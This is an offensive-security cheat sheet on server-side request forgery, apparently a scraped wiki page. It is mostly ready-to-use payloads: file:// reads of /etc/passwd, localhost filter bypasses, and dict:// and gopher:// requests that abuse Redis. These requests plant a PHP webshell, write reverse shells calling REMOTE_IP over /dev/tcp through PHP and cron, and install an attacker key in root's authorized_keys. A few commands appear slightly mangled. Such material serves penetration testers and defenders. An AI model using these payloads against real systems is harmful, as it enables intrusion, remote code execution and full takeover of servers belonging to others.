SERVER SIDE REQUEST FORGERY (SSRF)

https://vinc.top/2016/11/24/server-side-request-forgery https://github.com/allanlw/svg-cheatsheet

PoC and enumeration

It is possible to prove the vulnerability by reading local files

Using the file protocol

url=file:///etc/passwd

Then you can enumerate local services that are listening

Depending on the response

http://localhost:

It is also possible to use others protocols like gopher and dict

They don't send HTTP headers and can avoid misinterpretation

gopher://127.0.0.1:6379/test

Filter bypass

http://127.1 instead of http://127.0.0.1 http://0 instead of http://localhost http://0xC0A80001 or http://3232235521 => 192.168.0.1 192.168.516 => 192.168.2.4

Redis Exploitation

Redis is a database system that stores everything in RAM

Getting a webshell

url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" url=dict://127.0.0.1:6379/SAVE

Getting a reverse shell

gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 gopher://127.0.0.1:6379/_save nc -lvp http://site.org/reverse.php

Priv. Esc. using SSH key

ssh-keygen url=dict://127.0.0.1:6379/SET%20mykey%20"\n\nCLE_PUB_RSA_ICI\n\n" url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/root/.ssh url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20authorized_keys url=dict://127.0.0.1:6379/SAVE ssh -i id_rsa root@host.org

You can use dict protocol and crontab

- You set the working directory

- Update the redis database location

- Listening

- Write a reverse shell payload

- Save it

dict ://127.0.0.1:6379/config set dir /var/spool/cron/ dict ://127.0.0.1:6379/config set dbfilename root nc -lvp dict ://127.0.0.1:6379/set -.- "\n\n\n* * * * * bash -i >\x26 /dev/tcp/"ip"/"port" 0>\x261\n\n\n" dict ://127.0.0.1:6379/save

You can also use the gopher protocol (replace IP and port)

url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252462%250D%250A%250A%250A%252A/

PreviousBasic authentication bypass NextSQL injections

Last updated 2 years ago

hashtagIt is possible to prove the vulnerability by reading local files

hashtagUsing the file protocol

hashtagThen you can enumerate local services that are listening

hashtagDepending on the response

hashtagIt is also possible to use others protocols like gopher and dict

hashtagThey don't send HTTP headers and can avoid misinterpretation

hashtagFilter bypass

hashtagRedis is a database system that stores everything in RAM

hashtagGetting a webshell

hashtagGetting a reverse shell

hashtagPriv. Esc. using SSH key

hashtagYou can use dict protocol and crontab

hashtag- You set the working directory

hashtag- Update the redis database location

hashtag- Listening

hashtag- Write a reverse shell payload

hashtag- Save it

hashtagYou can also use the gopher protocol (replace IP and port)